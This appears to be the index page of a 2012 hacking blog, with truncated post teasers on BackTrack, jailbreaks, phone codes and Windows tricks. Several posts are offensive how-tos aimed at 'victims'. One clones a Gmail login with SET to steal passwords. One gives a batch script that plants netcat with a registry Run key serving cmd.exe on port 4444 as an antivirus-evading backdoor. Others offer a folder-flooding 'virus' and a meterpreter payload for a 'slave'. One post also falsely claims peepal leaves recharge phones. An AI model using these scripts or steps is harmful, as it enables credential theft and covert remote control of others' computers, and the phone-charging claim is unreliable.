Thursday, May 31, 2012

Backtrack | How to INSTALL BackTrack5

For hackers who wants to do penetration testing or some extra in hacking den Backtrack5 is a good choice...First u need to download backtrack5 from this link-->> http://www.backtrack-linux.org/downloads/ nd also download UNetbootin which is required--> http://unetbootin.sourceforge.net/ Now requirement :1. USB (Flash Drive) (Minimum USB Drive capacity 4 GB)2. Backtrack 5 ISO file, md5sum verified(which is available on above link)3. UNetbootinnow procedure to burn your USB.> Plug in ur USB Drive> Format the USB drive to FAT32> Start Unetbootin and select the "diskimage" option, choose a BackTrack 5 ISO...

Wednesday, May 30, 2012

How to Convert iOS 5.1.1 Tethered Jailbreak to Untethered Jailbreak Using Rocky Racoon 5.1.1 Untether

Rocky Racoon 5.1.1 Untether jailbreak on Cydia, which allows users who have a tethered jailbroken iOS device on iOS 5.1.1 to convert it into untethered jailbreak  Rocky Racoon is the underlying untethered jailbreak that will be installed by popular jailbreak tools such as redsn0w and absinthe... if you are using 5.1.1 and you can reboot your device and have it still jailbroken, you have Rocky Racoon.  If your device relies on Rocky Racoon on untethering, which includes any iPad 2, iPad 3 or iPhone 4S running 5.1.1., uninstalling this package will unjailbreak your device. So if you've a tethered jailbroken iOS...

Monday, May 28, 2012

HOW TO HACK GMAIL AND FACEBOOK WITH BACKTRACK 5

Requirement :: Backtrack 5 Open Backtrack, Type ifconfig to check IP Now Again Open Your Backtrack terminal and Type cd /pentest/exploits/set Now Open Social Engineering Toolkit (SET) ./ set Choose option 2, “Website Attack Vectors” Choose option 4, “Tabnabbing Attack Method”. Choose option 2, "Site Cloner" Enter the URL of the site you want to clone. In this case gmail(type url) and hit enter. Now send your IP to victim and when victim open IP is browser a fake Gmail page start working and when user input Username and Password in fake page. The Username and Password displayed on SET. Hope you like the tutoria...

Saturday, May 26, 2012

How to Create a FUD Backdoor – Bypass An Antivirus

Create a batch file that will add your Netcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you. @echo off copy rcat.exe %systemroot%\system32\rcat.exe if errorlevel 0 goto regedit goto error :regedit reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe" if errorlevel 0 goto ip :error echo something wrong with the program. goto end :ip echo write down the IP address from the table ipconfig :end echo end. nc -L -p 4444 -t Open a notepad and than save it to name.bat Download...

Friday, May 25, 2012

List Proxy Sites .com - Free Proxies 2012

Find Fresh New Proxy Sites For Unblocking Websities ...

Code to create a infinite folder in a drive | Pranks

Hi newbie Programmers, this batch code will very helpful for you.  This is simple and effective virus code.As usual open notepad.Copy this code to Notepad.@echo off:topmd %random%goto t...

Man-in-the-middle attack

The man-in-the-middle attack (often abbreviated MITM, also known as a bucket brigade attack, or sometimes Janus attack) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range...

Buzzcity Advertisement Loophole

BuzzCity loophole which publishers are utilizing to make money. Inept system of advertising publishing and fraud detection by the advertiser.. Recently BuzzCity - A mobile publishing and advertising agent, junked its server-to-server request based advertising system. This move by BuzzCity had already been speculated by mobile industry stalwarts as BuzzCity was achieving immense success and profits from its banner advertising (mostly in an deceiving manner). Such a move now allows them to steal loads of traffic from innocent publishers. When no AD shows up for the banner system, traffic gets diverted to its MyGamma Social Portal and this same traffic is resold by BuzzCity to potential advertisers, thus effectively degrading mobile traffic value....

Thursday, May 24, 2012

Secrets of free UC Web Mobile Browser

All mobile web enthusiasts, at some point of time have come across a certain mobile web browser called UCWEb. Typically UC Web stands for You Can Web (you can browse internet). UC Web is a browser created by a Chinese Software Corporation. It claims itself to be the dominant and most used browser within the Chinese community, and most probably it is a market leader there as it is one of the few rare browsers who have the functionality (language support) for Chinese people. Since it is a known fact that Android (CN version) is the most preferred operating system for Chinese mobile phones (courtesy to the opensource nature of Android),...

What is an IFrame Injection? Mass IFrame Attack Tutorial

What is an IFrame Injection? Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites. So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. Malware will be loaded to your computer, now you are infected What is IFrame Tag? <Iframe> tag stands for Inline Frame. It is used to insert contents from another website or server. That can be useful for building online applications....

Monday, May 14, 2012

How to Protect Your WordPress Blog From Being Hacked

Plugins are one of the main attracting core to wordpress rather than Blogger.. It makes job easy for you..I recommend Wordfence plugin for your safety. Here are some of its features.*. Scans your core files against a reference copy which you maintain in your cloud servers.*. Lets you see what has changed, how the file has changed and even repair it. *. Scans your comments, posts and all files including core, themes, plugins and everything else under your WordPress root directory for malware, virus signatures, vulnerabilities and (very importantly) URL’s that are known to host malware or viruses. *. Wordfence keeps known dangerous URL’s,...

Friday, May 11, 2012

READ SCRATCHED CD USING BADCOPY WITH KEY

Having problem with scratch cd Computer Getting hanged when a scracth CD is inserted Having inportant data on CD which become unreadable due to schratches We have came up with the solution .Use BADCOPY software which allows you to recover data from a scratch unreadable CD. Bad Copy allows you to store the the data from CD with out your computer getting hang. It will allow to view all the files and folders. Just insert CD and open BAD COPY it will show you all the Content of your CD Just select the important files and start rescue it will take some time but will then as you to save the content,just give the path and the important file...

25 Most Surprising Computer-Internet-Virus Facts

Here is a collection of 25 Most Interesting Computer Facts about Funny Computer & Internet facts. Just Have a Look, & you will sure get SurprisedThe Surprising Facts are :1. Another name for a Microsoft Windows tutorial is ‘Crash Course’!2. Bill Gates house was designed using a Macintosh computer .3. 80% of all pictures on the internet are of naked women 4. By the year 2012 there will be approximately 17 billion devices connected to the Internet.5. Domain names are being registered at a rate of more than one million names every month.6. E-mail has been around longer than the World Wide Web.7. For every ‘normal’ webpage, there are...

BSNL Official Balance Transfer trick

BSNL has recently changed their portal numbers so that we can’t access some services as we previously use. As a result their official balance transfer trick has also changed.Register for PTOP- STEP 1 -Register for PTOP by sending“register ptop” to 54455.STEP 2 -After registering you will get a password.STEP 3 -For balance transfer you have to sendGIFT(space)friends no.(space)amount(space)passwardto 54455EXAMPLE – GIFT 9400082099 25999990 to 54455STEP 4 -Now you will receive a SMS confirmation of the transf...

Friday, May 04, 2012

Auto Hide IP Full

Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Auto Hide IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button. Auto Hide IP is privacy-protection software which enables you to conceal your real IP address, surf anonymously, and automatically change your IP address every few minutes.With it, you can select fake IP from different countries via “Choose IP Country”...

Encrypt Your USB Drive with TrueCrypt

Sharing your personal data with your friends by flash/USB drives is by far the most effective and efficient way of data transferring. USB drives of today all available in all shape and sizes some are large – nail like, while majority is in small compact size. But, due to its small size, its also vulnerable to get stolen or misplaced. If it ever gets stolen, you are at a risk of revealing all your personal information available in the USB to who ever stole ...

LATEST ANDROID MOBILE TRICKS | SECRET CODES FOR ANDROID MOBILE

Latest Android Mobile tricks 2011:Cell Battery, WiFi Usage etc Info *#*#4636#*#*Restore Factory Settings*#*#7780#*#*Format Phone*2767*3855# Launch service mode *#*#197328640#*#*Test WiFi*#*#232339#*#* or*#*#526#*#* or*#*#528#...

Thursday, May 03, 2012

Hack your friend by using BackTrack 5 | Backtrack 5 tutorial

BackTrack 4 is an penetration testing tool that is run as an live CD , it is an modded form of Linx(Ubuntu) that can be used for hacking.In this tutorial I will show you how to generate payloads in it.WARNING !!!!!!!!!!!!!! THIS HAS BEEN DISCUSSED TO TELL YOU ABOUT THE WAYS IN WHICH YOUR COMPUTER MIGHT BE EXPLIOTED !!!! DO NOT USE THIS ON ANYONE ELSE OTHER THAN YOURSELF ! In this tutorial we will be using a useful tool on Backtrack 4 to create a payload which we will then send a slave, the payload created is in exe, once the slave is Social Engineered into running the payload, A meterpreter session will appear to us. We will set it up...

Charge Your Mobile Without Charger

You can charge your mobile phone without a charger. You just need a green leaf of peepal tree and after some time your mobile phone does get charged. If your mobile has been discharged and you are in a forest and have no charger on you, do not worry. You Should take two peepal leaves and you will be able to charge your cell phoneIt is very good concept and easy to charge your mobile. You just have to open your mobile battery and connect it with peepal leaf. After that without shaking mobile set, you should set the battery in your mobile set. After some time your mobile would be charged. Residents of Chitrakoot conducted an experiment on...

Disable Internet Cafe Timer

Note:Use This Software At Your Responsibil...

Wednesday, May 02, 2012

Free Download Norton Antivirus 2012 Free For 6 Months

Hello Friends,Norton Antivirus Gives Free Trial For Six Months Without Entering Any License Key.Norton Claims The Antivirus Will Be Quick In Detecting And Elimination Of Viruses.Auto Protect Feature Gives Comprehensive Real Time Protection,Working Silently In The Background.1] Visit Norton Promotion Web Page And Click Start Download ButtonTo Download Norton Download Manager Client.2] Click Norton Download Manager Client To Let It Download.Antivirus Size:- 106.48 MB3] Complete The Installations By EnteringYour E-Mail Id, Password And Other Detai...

Install Google Chrome in Backtrack 5

Many people are questioning how to install Google chrome in backtrack.This time I will tell you how to install Google chrome in backtrack 5. Follow the steps below :1. apt-get install chromium-browserYou can also use synaptic and select the chromium-browser.2. cd /usr/lib/chromium-brow...

Drive “Access Is Denied” Message Solution

Drive “Access is denied” message?start>Run=type(“CMD&quot; without ” “) enter.follow these1. go to C:\ by typing C:\>cd c:\2. type C:\>attrib -S -H -R autorun.inf3. delete the file by typing C:\>del autorun.inf 4. goto drive D: by typing C:\>...

Useful Run Commands For Windows XP

Here is a list of commands that you can run off from the Run Command prompt in XP:Program Run Command Accessibility Controls = access.cplAccessibility Wizard = accwizAdd Hardware Wizard = hdwwiz.cplAdd/Remove Programs = appwiz.cplAdministrative Tools = control admintoolsAdobe Acrobat ( if installed ) = acrobatAdobe Distiller ( if installed ) = acrodistAdobe ImageReady ( if installed ) = imagereadyAdobe Photoshop ( if installed ) = photoshopAutomatic Updates = wuaucpl.cplBasic Media Player = mplay32Bluetooth Transfer Wizard = fsquirtCalculator = calcCcleaner ( if installed ) = ccleanerC: Drive = c:Certificate Manager = cdrtmgr.mscCharacter Map...

CONFIGURE IP ADDRESS IN BACKTRACK

Labels: Linux |BackTrack is the very famous Live CD Linux Distribution, and it is use for Penetration testing and it has wide range of security tools, to connect BackTrack computer with the network you have to configure IP address on the LAN Interf...
Page 1 of 5812345Next

 
Design by Secure Hackers